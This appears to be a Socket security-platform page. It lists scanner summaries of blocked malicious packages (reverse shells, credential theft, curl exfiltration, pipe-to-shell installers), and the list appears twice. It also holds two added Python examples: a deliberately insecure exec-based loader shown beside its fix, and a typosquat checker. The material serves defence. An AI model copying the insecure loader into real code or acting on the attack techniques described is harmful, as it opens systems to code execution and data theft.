Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0

left-pad: stevemao published 1.3.0

react: react-bot published 19.2.4

We protect you from vulnerable and malicious packages

group-based-policy

5.9.0

Live on pypi

Blocked by Socket

The script exhibits high-risk, persistence-enabled behavior by injecting external components into Python site-packages, installing a boot-time service, and providing a world-writable executable. The lack of integrity checks, reliance on /root as a source, and permissive permissions create strong supply-chain and host-compromise risk. Treat as dangerous and require thorough validation, non-production sandbox testing, or removal from automated pipelines.

hackingtools

3.0.0.954

Live on pypi

Blocked by Socket

The code demonstrates high-risk behavior typical of dropper/packer-like workflows: encrypted payloads embedded in stubs, base64-wrapped code executed at runtime, and optional packaging into executables. While there are syntax anomalies and incomplete branches that prevent immediate execution, the overall pattern is aligned with covert payload delivery or supply-chain risk. Thorough review of the complete, verified source is required before use; treat as dangerous and isolate until confirmed safe.

yspliveplayer-new

0.3.6

Live on npm

Blocked by Socket

This module contains heavy obfuscation and dynamic decoding that reads browser state (document/window/opener) and uses CryptoJS to derive/produce a cryptographic value returned by getckey. The obfuscation, dynamic property access, and use of page/browser data are strong indicators of malicious or at least intentionally concealed behavior (likely token/key derivation or decryption for further malicious use). I recommend treating this package as suspicious and not using it until its clear, unobfuscated purpose and callers are inspected. If found in a dependency, remove or isolate it and perform a broader supply-chain investigation.

bcmd

0.0.51

Removed from pypi

Blocked by Socket

A legitimate Python development tool with a critical command injection vulnerability. The os.system() call with unescaped user input poses a significant security risk, allowing potential arbitrary command execution.

Live on pypi for 21 minutes before removal. Socket users were protected even while the package was live.

cube-sign-cli

1.9.0

by jpdhackerone03

Removed from npm

Blocked by Socket

The source code exhibits behavior consistent with data exfiltration malware. It collects sensitive system information and sends it to external endpoints without user consent, posing a significant security risk.

Live on npm for 30 days, 12 hours and 58 minutes before removal. Socket users were protected even while the package was live.

elf-stats-sparkly-snowflake-139

1.0.0

by skimming1239499

Live on npm

Blocked by Socket

This module implements deliberate data exfiltration: it enumerates and reads files from a hardcoded local directory and transmits their contents and filenames to a hardcoded remote webhook by invoking curl via child_process.execSync. The exported API returns a benign-looking object, likely to mask the malicious side-effect. This is malicious behavior in a supply-chain context. Remove the package, treat any systems that ran it as compromised, and investigate what data may have been exposed. Replace with audited, safe code and rotate any secrets that could have been stored under the targeted directory.

scraper2-hj3415

0.0.3

Removed from pypi

Blocked by Socket

The module is a serializer/deserializer (AOT jelling/unjelling) with functionality that can execute arbitrary code when given crafted input. The code itself is not obviously malicious, but it provides standard deserialization features that will execute code during object reconstruction (compile/eval, reflect.namedObject, __setstate__, copyreg loaders). Treat any AOT/source input as fully untrusted; do not call unjellyFromSource or unjellyFromAOT on attacker-controlled data. Use only on trusted inputs or with additional sandboxing.

Live on pypi for 1 hour and 31 minutes before removal. Socket users were protected even while the package was live.

mtxai

0.0.161

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

vasprocar

1.1.19.17

Live on pypi

Blocked by Socket

This fragment appears to be part of a legitimate DOS/pDOS post-processing tool for Quantum ESPRESSO, but it uses multiple high-risk patterns: executing external Python files (exec(open(...).read())), copying and injecting variable content into a script and then executing it, and using bare excepts that suppress errors. These behaviors make the module vulnerable to supply-chain or local-file-tampering attacks: if an attacker can modify files in main_dir or dir_files (or influence the variables used to build filenames), they can achieve arbitrary code execution with the same privileges as the user running this script. I did not find explicit malicious payloads (no networking/exfiltration, no reverse shell code, no hardcoded secrets), so the code itself looks more insecure than intentionally malicious. Recommendation: avoid exec on arbitrary files; validate and/or cryptographically verify any scripts before executing; minimize use of globals and prefer importing modules safely; sanitize inputs and fail loudly rather than swallowing exceptions. Also review the rest of the project for places that set the variables used to build filenames. Note: the fragment contains multiple syntax errors and appears truncated, which reduces the certainty of this analysis.

elf-stats-storybook-reindeer-552

2.1.1

Live on npm

Blocked by Socket

This file implements a straightforward and functional reverse shell: it connects to a hardcoded remote IP:port, spawns /bin/sh, and pipes input/output between the shell and the network socket. This gives a remote actor arbitrary command execution and data exfiltration capabilities. The code is malicious in context and poses an immediate, high-risk threat. Remove/quarantine the file and treat systems that ran it as compromised.

dnszlsk/muad-dib

daf4a877a95e4b13624288ba2522006379eb0d9d

Live on actions

Blocked by Socket

This install script runs package code automatically at install time and the package itself declares it is C2 malware. Treat this as malicious: do not install in any environment you care about. Inspecting lib/init.js is required to determine exact capabilities, but the risk includes remote control, telemetry/exfiltration, persistence, and arbitrary code execution.

sbcli-debug

2.1.5

Live on pypi

Blocked by Socket

This module is not overtly malicious (no encoded payloads, no external exfiltration, no reverse shell), but it contains high-risk insecure patterns: user-controlled values are directly interpolated into shell command strings and passed to node_utils.run_command, creating a strong command-injection risk if run_command executes via a shell. The endpoints also expose detailed system information which may be sensitive. Recommend: validate/whitelist inputs, avoid shell=True or use argument lists for subprocess, escape or validate command arguments, add authentication/authorization, reduce logging of sensitive data, and review node_utils.run_command implementation. Until those mitigations are in place, treat the package as risky for production use.

mtmai

0.3.1105

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

dnszlsk/muad-dib

e988b29dd74bd4ab6dc070bccb3e0d786d9ac411

Live on actions

Blocked by Socket

This snippet is malicious or extremely unsafe: it decodes and executes a hard-coded curl command to a suspicious domain via a shell. Treat as high-risk malware: do not run, remove or isolate the package, and investigate execution contexts where it may have run. Replace with safe, explicit network code with strict validation or remove entirely.

n8n-nodes-string-convert

1.0.0

by coraljaclin

Live on npm

Blocked by Socket

This module is malicious or at minimum highly malicious-looking: it performs extensive sensitive data collection (environment variables, private keys, .env files, n8n database + decryption of credentials, cloud metadata endpoints to harvest credentials, SSH keys, docker config, npmrc, bash history, etc.), runs many shell commands for reconnaissance, and returns all data via the node output. Although it does not itself transmit data to outside internet domains, the node output can be easily forwarded by an attacker-controlled workflow, so inclusion of this module in a repository or runtime poses a severe supply-chain/data-exfiltration risk. It should not be used and systems where it is present should be considered compromised and investigated immediately.

354766/feiskyer/openclaw-kubernetes/claude-skill/

426dd532ac541acd3c3771f5da7fe9997462487a

Live on socket

Blocked by Socket

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

@ostyado/baileys

1.1.2

by ostyado

Live on npm

Blocked by Socket

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

354766/inference-sh-0/skills/data-visualization/

a0d23e61b7818cbe1837cb38c70920eeeaf28d46

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected

All findings:

[CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4]

[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]

[CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]

The package/documentation is functionally benign and intended to help users create visualizations, but it contains multiple high-risk operational patterns: a pipe-to-shell installer (curl | sh), repeated examples that transmit arbitrary code/data to third-party remote executors, and broad allowed-tool permissions. These patterns create realistic opportunities for credential or data leakage and increase supply-chain risk if distribution endpoints are compromised. Recommendations: do not use curl | sh without manual verification of the installer and checksum; avoid sending secrets or production data to remote executors; prefer local execution for sensitive data; and the project should add explicit warnings and demonstrate checksum verification and least-privilege installation paths.

LLM verification: The skill is functionally benign and aligns with its data-visualization purpose. No direct indicators of malware or obfuscation were found in the provided content. The primary security concern is supply-chain and operational: the pipe-to-shell install pattern, lack of explicit guidance about handling secrets and credential storage, and encouraging remote execution of arbitrary user code. Recommend removing or de-emphasizing the curl | sh quick-start, replacing it with an explicit download + chec

cornflakes

3.1.2

Live on pypi

Blocked by Socket

The code embeds a dangerous dynamic execution pattern by re-reading and executing the caller file contents in a separate Python process and then invoking the function by name. This can re-run initialization code, access sensitive data, and enable covert execution in a background context. It represents a notable supply-chain risk if the caller file is modifiable by an attacker. Recommend removing exec-based loading, using a clearly defined worker model (multiprocessing or threading with explicit callable targets), and implementing strict input validation and error handling to mitigate exposure.

github.com/bishopfox/sliver

v1.5.40-0.20231110210156-f944d24dc3f0

Live on go

Blocked by Socket

This source file is part of the Sliver post-exploitation implant agent and implements remote-controlled offensive capabilities: arbitrary command execution, code injection into other processes, dynamic/native extension loading, privilege escalation (token manipulation), registry and service manipulation, and process memory dumping. These are explicit backdoor/malware behaviors. If present in a dependency for legitimate software, it represents a critical supply-chain compromise. It should not be used in production outside of controlled red-team engagements and must be treated as malicious in a general-purpose dependency context.

strawberry-pm

1.1.6

by kepempem

Live on npm

Blocked by Socket

The code dynamically loads and executes scripts from an untrusted domain (e.g., 'distributerry[.]com') without validation, leading to potential remote code execution. It uses 'eval' to parse JSON, which can execute arbitrary code. The code also sends data to external domains, raising concerns about data exfiltration.

create-non-enumerable-property

99.10.13

by rxtop49h

Removed from npm

Blocked by Socket

The code is designed to exfiltrate sensitive system and network information to an external server. The conditions in `isValid` and use of specific encoding functions suggest a deliberate attempt to hide the true nature and selectively activate this behavior, indicative of a malware-like payload.

Live on npm for 7 hours and 4 minutes before removal. Socket users were protected even while the package was live.

carbonorm/carbonphp

14.0.6

Live on composer

Blocked by Socket

The codebase contains legitimate migration tooling but includes a high-risk backdoor-like construct (selfHidingFile) that can be invoked to disclose or serve local files under license control. When combined with broad filesystem and network interactions driven by external inputs, this creates a serious security risk and potential for misuse in a compromised supply chain. Recommend removing or isolating the selfHidingFile payload, tightening input validation, ensuring least privilege for filesystem operations, and performing a formal security review of all dynamic code generation and remote fetch pathways.

pocs

1.1

Live on pypi

Blocked by Socket

This file is a clear proof-of-concept exploit for ThinkPHP RCE. It constructs and sends HTTP requests with hardcoded payloads that attempt to execute phpinfo() on remote servers and checks for 'allow_url_fopen' to confirm success. It should not be run against systems without explicit authorization. The snippet contains a minor syntax error in the example usage and uses overly broad exception handling. While it does not include persistence or direct data exfiltration in this fragment, its network requests can trigger remote code execution, making it a high-risk offensive tool.

group-based-policy

5.9.0

Live on pypi

Blocked by Socket

The script exhibits high-risk, persistence-enabled behavior by injecting external components into Python site-packages, installing a boot-time service, and providing a world-writable executable. The lack of integrity checks, reliance on /root as a source, and permissive permissions create strong supply-chain and host-compromise risk. Treat as dangerous and require thorough validation, non-production sandbox testing, or removal from automated pipelines.

hackingtools

3.0.0.954

Live on pypi

Blocked by Socket

The code demonstrates high-risk behavior typical of dropper/packer-like workflows: encrypted payloads embedded in stubs, base64-wrapped code executed at runtime, and optional packaging into executables. While there are syntax anomalies and incomplete branches that prevent immediate execution, the overall pattern is aligned with covert payload delivery or supply-chain risk. Thorough review of the complete, verified source is required before use; treat as dangerous and isolate until confirmed safe.

yspliveplayer-new

0.3.6

Live on npm

Blocked by Socket

This module contains heavy obfuscation and dynamic decoding that reads browser state (document/window/opener) and uses CryptoJS to derive/produce a cryptographic value returned by getckey. The obfuscation, dynamic property access, and use of page/browser data are strong indicators of malicious or at least intentionally concealed behavior (likely token/key derivation or decryption for further malicious use). I recommend treating this package as suspicious and not using it until its clear, unobfuscated purpose and callers are inspected. If found in a dependency, remove or isolate it and perform a broader supply-chain investigation.

bcmd

0.0.51

Removed from pypi

Blocked by Socket

Legitimate Python development tool with critical command injection vulnerability. The os.system() usage with unescaped user input poses significant security risk, allowing potential arbitrary command execution.

Live on pypi for 21 minutes before removal. Socket users were protected even while the package was live.

cube-sign-cli

1.9.0

by jpdhackerone03

Removed from npm

Blocked by Socket

The source code exhibits behavior consistent with data exfiltration malware. It collects sensitive system information and sends it to external endpoints without user consent, posing a significant security risk.

Live on npm for 30 days, 12 hours and 58 minutes before removal. Socket users were protected even while the package was live.

elf-stats-sparkly-snowflake-139

1.0.0

by skimming1239499

Live on npm

Blocked by Socket

This module implements deliberate data exfiltration: it enumerates and reads files from a hardcoded local directory and transmits their contents and filenames to a hardcoded remote webhook by invoking curl via child_process.execSync. The exported API returns a benign-looking object, likely to mask the malicious side-effect. This is malicious behavior in a supply-chain context. Remove the package, treat any systems that ran it as compromised, and investigate what data may have been exposed. Replace with audited, safe code and rotate any secrets that could have been stored under the targeted directory.

scraper2-hj3415

0.0.3

Removed from pypi

Blocked by Socket

The module is a serializer/deserializer (AOT jelling/unjelling) with functionality that can execute arbitrary code when given crafted input. The code itself is not obviously malicious, but it provides standard deserialization features that will execute code during object reconstruction (compile/eval, reflect.namedObject, __setstate__, copyreg loaders). Treat any AOT/source input as fully untrusted; do not call unjellyFromSource or unjellyFromAOT on attacker-controlled data. Use only on trusted inputs or with additional sandboxing.

Live on pypi for 1 hour and 31 minutes before removal. Socket users were protected even while the package was live.

mtxai

0.0.161

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

vasprocar

1.1.19.17

Live on pypi

Blocked by Socket

This fragment appears to be part of a legitimate DOS/pDOS post-processing tool for Quantum ESPRESSO, but it uses multiple high-risk patterns: executing external Python files (exec(open(...).read())), copying and injecting variable content into a script and then executing it, and using bare excepts that suppress errors. These behaviors make the module vulnerable to supply-chain or local-file-tampering attacks: if an attacker can modify files in main_dir or dir_files (or influence the variables used to build filenames), they can achieve arbitrary code execution with the same privileges as the user running this script. I did not find explicit malicious payloads (no networking/exfiltration, no reverse shell code, no hardcoded secrets), so the code itself looks more insecure than intentionally malicious. Recommendation: avoid exec on arbitrary files; validate and/or cryptographically verify any scripts before executing; minimize use of globals and prefer importing modules safely; sanitize inputs and fail loudly rather than swallowing exceptions. Also review the rest of the project for places that set the variables used to build filenames. Note: the fragment contains multiple syntax errors and appears truncated which reduces certainty of the analysis.

elf-stats-storybook-reindeer-552

2.1.1

Live on npm

Blocked by Socket

This file implements a straightforward and functional reverse shell: it connects to a hardcoded remote IP:port, spawns /bin/sh, and pipes input/output between the shell and the network socket. This gives a remote actor arbitrary command execution and data exfiltration capabilities. The code is malicious in context and poses an immediate, high-risk threat. Remove/quarantine the file and treat systems that ran it as compromised.

dnszlsk/muad-dib

daf4a877a95e4b13624288ba2522006379eb0d9d

Live on actions

Blocked by Socket

This install script runs package code automatically at install time and the package itself declares it is C2 malware. Treat this as malicious: do not install in any environment you care about. Inspecting lib/init.js is required to determine exact capabilities, but the risk includes remote control, telemetry/exfiltration, persistence, and arbitrary code execution.

sbcli-debug

2.1.5

Live on pypi

Blocked by Socket

This module is not overtly malicious (no encoded payloads, no external exfiltration, no reverse shell), but it contains high-risk insecure patterns: user-controlled values are directly interpolated into shell command strings and passed to node_utils.run_command, creating a strong command-injection risk if run_command executes via a shell. The endpoints also expose detailed system information which may be sensitive. Recommend: validate/whitelist inputs, avoid shell=True or use argument lists for subprocess, escape or validate command arguments, add authentication/authorization, reduce logging of sensitive data, and review node_utils.run_command implementation. Until those mitigations are in place, treat the package as risky for production use.

mtmai

0.3.1105

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

dnszlsk/muad-dib

e988b29dd74bd4ab6dc070bccb3e0d786d9ac411

Live on actions

Blocked by Socket

This snippet is malicious or extremely unsafe: it decodes and executes a hard-coded curl command to a suspicious domain via a shell. Treat as high-risk malware: do not run, remove or isolate the package, and investigate execution contexts where it may have run. Replace with safe, explicit network code with strict validation or remove entirely.

n8n-nodes-string-convert

1.0.0

by coraljaclin

Live on npm

Blocked by Socket

This module is malicious or at minimum highly malicious-looking: it performs extensive sensitive data collection (environment variables, private keys, .env files, n8n database + decryption of credentials, cloud metadata endpoints to harvest credentials, SSH keys, docker config, npmrc, bash history, etc.), runs many shell commands for reconnaissance, and returns all data via the node output. Although it does not itself transmit data to outside internet domains, the node output can be easily forwarded by an attacker-controlled workflow, so inclusion of this module in a repository or runtime poses a severe supply-chain/data-exfiltration risk. It should not be used and systems where it is present should be considered compromised and investigated immediately.

354766/feiskyer/openclaw-kubernetes/claude-skill/

426dd532ac541acd3c3771f5da7fe9997462487a

Live on socket

Blocked by Socket

The analyzed skill is coherent with an end-to-end Claude Code automation framework, including isolation, logging, and PR lifecycle management. Security concerns center on permission-bypass capabilities, autonomous long-running execution, and access to logs/registries that may reveal prompts or intents. Governance controls, least-privilege prompts, strict access controls for logs/registries, and per-action approvals are recommended to mitigate risk. Overall, the design is powerful but requires careful sandboxing and operational governance.

@ostyado/baileys

1.1.2

by ostyado

Live on npm

Blocked by Socket

`lotusbail` is a malicious npm package that masquerades as a WhatsApp Web API library by forking legitimate Baileys-based code and preserving working messaging functionality. In addition to normal API behavior, it inserts a wrapper around the WhatsApp WebSocket client so that all traffic passing through the library is duplicated for collection. Reported data theft includes WhatsApp authentication tokens and session keys, full message content (sent/received and historical), contact lists (including phone numbers), and transferred media/files. The package also attempts to establish persistent unauthorized access by hijacking the WhatsApp device-linking (“pairing”) workflow using a hardcoded pairing code, effectively linking an attacker-controlled device to the victim’s account; removing the npm dependency does not automatically remove the linked device. To hinder detection, the exfiltration endpoint is hidden behind multiple obfuscation layers, collected data is encrypted (including a custom RSA implementation), and the code includes anti-debugging traps designed to disrupt analysis.

354766/inference-sh-0/skills/data-visualization/

a0d23e61b7818cbe1837cb38c70920eeeaf28d46

Live on socket

Blocked by Socket

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] The package/documentation is functionally benign and intended to help users create visualizations, but it contains multiple high-risk operational patterns: a pipe-to-shell installer (curl | sh), repeated examples that transmit arbitrary code/data to third-party remote executors, and broad allowed-tool permissions. These patterns create realistic opportunities for credential or data leakage and increase supply-chain risk if distribution endpoints are compromised. Recommendations: do not use curl | sh without manual verification of the installer and checksum; avoid sending secrets or production data to remote executors; prefer local execution for sensitive data; and the project should add explicit warnings and demonstrate checksum verification and least-privilege installation paths. LLM verification: The skill is functionally benign and aligns with its data-visualization purpose. No direct indicators of malware or obfuscation were found in the provided content. The primary security concern is supply-chain and operational: the pipe-to-shell install pattern, lack of explicit guidance about handling secrets and credential storage, and encouraging remote execution of arbitrary user code. Recommend removing or de-emphasizing the curl | sh quick-start, replacing it with an explicit download + chec

cornflakes

3.1.2

Live on pypi

Blocked by Socket

The code embeds a dangerous dynamic execution pattern by re-reading and executing the caller file contents in a separate Python process and then invoking the function by name. This can re-run initialization code, access sensitive data, and enable covert execution in a background context. It represents a notable supply-chain risk if the caller file is modifiable by an attacker. Recommend removing exec-based loading, using a clearly defined worker model (multiprocessing or threading with explicit callable targets), and implementing strict input validation and error handling to mitigate exposure.
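To make the cornflakes finding concrete, the following added example (not the package's code) shows the flagged pattern next to the recommended fix: a loader that re-reads the caller file from disk and execs its full text in a fresh interpreter, beside a worker that receives an explicit callable. The "caller" module, its initialization side effect and the tampering step are constructed here to show why the re-exec approach replays initialization and runs whatever an attacker with write access put in the file.

```python
"""The exec-based caller re-loading pattern flagged in cornflakes, next to a worker
that receives an explicit callable. Added example, not the package's code; the
'caller' module and its initialization side effect are constructed here."""
import importlib.util
import os
import subprocess
import sys
import tempfile
import threading

# Constructed caller module: one job function plus initialization that leaves a trace.
CALLER_TEMPLATE = (
    "with open({counter!r}, 'a') as f:\n"
    "    f.write('init\\n')  # module-level side effect: runs every time this text executes\n"
    "\n"
    "def job(x):\n"
    "    return x * 2\n"
)


def write_caller(path, counter):
    with open(path, "w") as f:
        f.write(CALLER_TEMPLATE.format(counter=counter))


def init_count(counter):
    """How many times the caller's module-level code has executed so far."""
    if not os.path.exists(counter):
        return 0
    with open(counter) as f:
        return sum(1 for _ in f)


def load_module(path):
    """Import the caller once, the normal way; initialization runs exactly once here."""
    spec = importlib.util.spec_from_file_location("caller_mod", path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod


def run_by_reexec(caller_path, func_name, arg):
    """DANGEROUS (the flagged pattern): re-read the caller file from disk, exec its
    full text in a fresh interpreter, then look the function up by name. Whatever
    the file contains at call time runs: initialization code again, and any edit
    an attacker made to the file in the meantime."""
    with open(caller_path) as f:
        source = f.read()
    bootstrap = (
        "import sys\n"
        "ns = {}\n"
        "exec(sys.stdin.read(), ns)\n"
        f"print(ns[{func_name!r}]({arg!r}))\n"
    )
    proc = subprocess.run([sys.executable, "-c", bootstrap], input=source,
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def run_explicit(target, arg):
    """SAFER: hand the worker a concrete callable that was bound when the module was
    legitimately imported. Nothing is re-read from disk and no module-level code is
    replayed. A multiprocessing.Process with the same target works the same way."""
    result = {}
    worker = threading.Thread(target=lambda: result.setdefault("value", target(arg)))
    worker.start()
    worker.join()
    return result["value"]


def demo():
    """Run both approaches before and after the caller file is tampered with."""
    with tempfile.TemporaryDirectory() as d:
        caller = os.path.join(d, "caller.py")
        counter = os.path.join(d, "inits.log")
        write_caller(caller, counter)
        mod = load_module(caller)                            # init runs once (count = 1)
        out = {"reexec": run_by_reexec(caller, "job", 2)}    # init replayed (count = 2)
        out["explicit"] = run_explicit(mod.job, 2)           # no replay (count still 2)
        out["inits_before_tamper"] = init_count(counter)
        # An attacker with write access to the caller file appends a replacement.
        with open(caller, "a") as f:
            f.write("\ndef job(x):\n    return 'tampered'\n")
        out["reexec_after_tamper"] = run_by_reexec(caller, "job", 2)  # attacker code runs
        out["explicit_after_tamper"] = run_explicit(mod.job, 2)       # still the original
        out["inits_after_tamper"] = init_count(counter)
        return out


if __name__ == "__main__":
    print(demo())
```

The re-exec loader returns "4" before tampering and "tampered" after it, and each call adds another line to the initialization log; the explicit-callable worker returns 4 both times and never touches the file again.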

github.com/bishopfox/sliver

v1.5.40-0.20231110210156-f944d24dc3f0

Live on go

Blocked by Socket

This source file is part of the Sliver post-exploitation implant agent and implements remote-controlled offensive capabilities: arbitrary command execution, code injection into other processes, dynamic/native extension loading, privilege escalation (token manipulation), registry and service manipulation, and process memory dumping. These are explicit backdoor/malware behaviors. If present in a dependency for legitimate software, it represents a critical supply-chain compromise. It should not be used in production outside of controlled red-team engagements and must be treated as malicious in a general-purpose dependency context.

strawberry-pm

1.1.6

by kepempem

Live on npm

Blocked by Socket

The code dynamically loads and executes scripts from an untrusted domain (e.g., 'distributerry[.]com') without validation, leading to potential remote code execution. It uses 'eval' to parse JSON, which can execute arbitrary code. The code also sends data to external domains, raising concerns about data exfiltration.

create-non-enumerable-property

99.10.13

by rxtop49h

Removed from npm

Blocked by Socket

The code is designed to exfiltrate sensitive system and network information to an external server. The conditions in `isValid` and use of specific encoding functions suggest a deliberate attempt to hide the true nature and selectively activate this behavior, indicative of a malware-like payload.

Live on npm for 7 hours and 4 minutes before removal. Socket users were protected even while the package was live.

carbonorm/carbonphp

14.0.6

Live on composer

Blocked by Socket

The codebase contains legitimate migration tooling but includes a high-risk backdoor-like construct (selfHidingFile) that can be invoked to disclose or serve local files under license control. When combined with broad filesystem and network interactions driven by external inputs, this creates a serious security risk and potential for misuse in a compromised supply chain. Recommend removing or isolating the selfHidingFile payload, tightening input validation, ensuring least privilege for filesystem operations, and performing a formal security review of all dynamic code generation and remote fetch pathways.

pocs

1.1

Live on pypi

Blocked by Socket

This file is a clear proof-of-concept exploit for ThinkPHP RCE. It constructs and sends HTTP requests with hardcoded payloads that attempt to execute phpinfo() on remote servers and checks for 'allow_url_fopen' to confirm success. It should not be run against systems without explicit authorization. The snippet contains a minor syntax error in the example usage and uses overly broad exception handling. While it does not include persistence or direct data exfiltration in this fragment, its network requests can trigger remote code execution, making it a high-risk offensive tool.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Telemetry

Unstable ownership

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

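The "Possible typosquat attack" signal above is the kind of check a team can also run locally before adding a dependency. The following added example (not Socket's detection logic) flags a candidate name that is a separator/case variant of a well-known package or within one edit (including an adjacent-character swap) of it, using optimal string alignment distance. The popular-name list is constructed for the demonstration and the distance threshold is an assumption.

```python
"""Typosquat candidate check: compares a new dependency name against a list of
well-known package names using separator/case normalization and optimal string
alignment distance (Levenshtein plus adjacent transposition). Added example;
the popular-name list is constructed and the thresholds are assumptions, not
Socket's rules."""
import re

# Constructed list standing in for a registry's most-downloaded names.
POPULAR = ["lodash", "express", "react", "left-pad", "requests", "numpy", "chalk", "axios"]


def normalize(name):
    """Lowercase, drop an npm scope prefix, and remove separator characters so that
    'Left_Pad' and '@x/left-pad' both become 'leftpad'."""
    name = name.lower()
    name = re.sub(r"^@[^/]+/", "", name)
    return re.sub(r"[-_.]", "", name)


def osa_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, or swap two
    adjacent characters, each costing 1. Catches 'lodahs' -> 'lodash' as 1 edit."""
    m, n = len(a), len(b)
    d = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m + 1):
        d[i][0] = i
    for j in range(n + 1):
        d[0][j] = j
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[m][n]


def typosquat_candidates(name, popular=POPULAR, max_distance=1):
    """Return (popular_name, reason) pairs that `name` is suspiciously close to.
    An exact match is the real package and is never reported; very short popular
    names are skipped for the edit-distance rule to limit false positives."""
    if name in popular:
        return []
    norm = normalize(name)
    hits = []
    for p in popular:
        pn = normalize(p)
        if norm == pn:
            hits.append((p, "separator/case variant"))
        elif len(pn) >= 4:
            dist = osa_distance(norm, pn)
            if dist <= max_distance:
                hits.append((p, f"edit distance {dist}"))
    return hits


if __name__ == "__main__":
    for candidate in ["lodahs", "leftpad", "@acme/Axios", "reqeusts", "lodash", "fancy-widget"]:
        print(candidate, "->", typosquat_candidates(candidate))
```

A hit is a reason to look at the package's publisher, age and download history before installing, not proof of malice: legitimate forks and scoped mirrors also normalize to a popular name.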

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.


Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.


RUST: crates.io (Rust Package Manager)

PHP: Packagist (PHP Package Manager)

GOLANG: Go Modules (Go Dependency Management)

JAVA: Maven Central

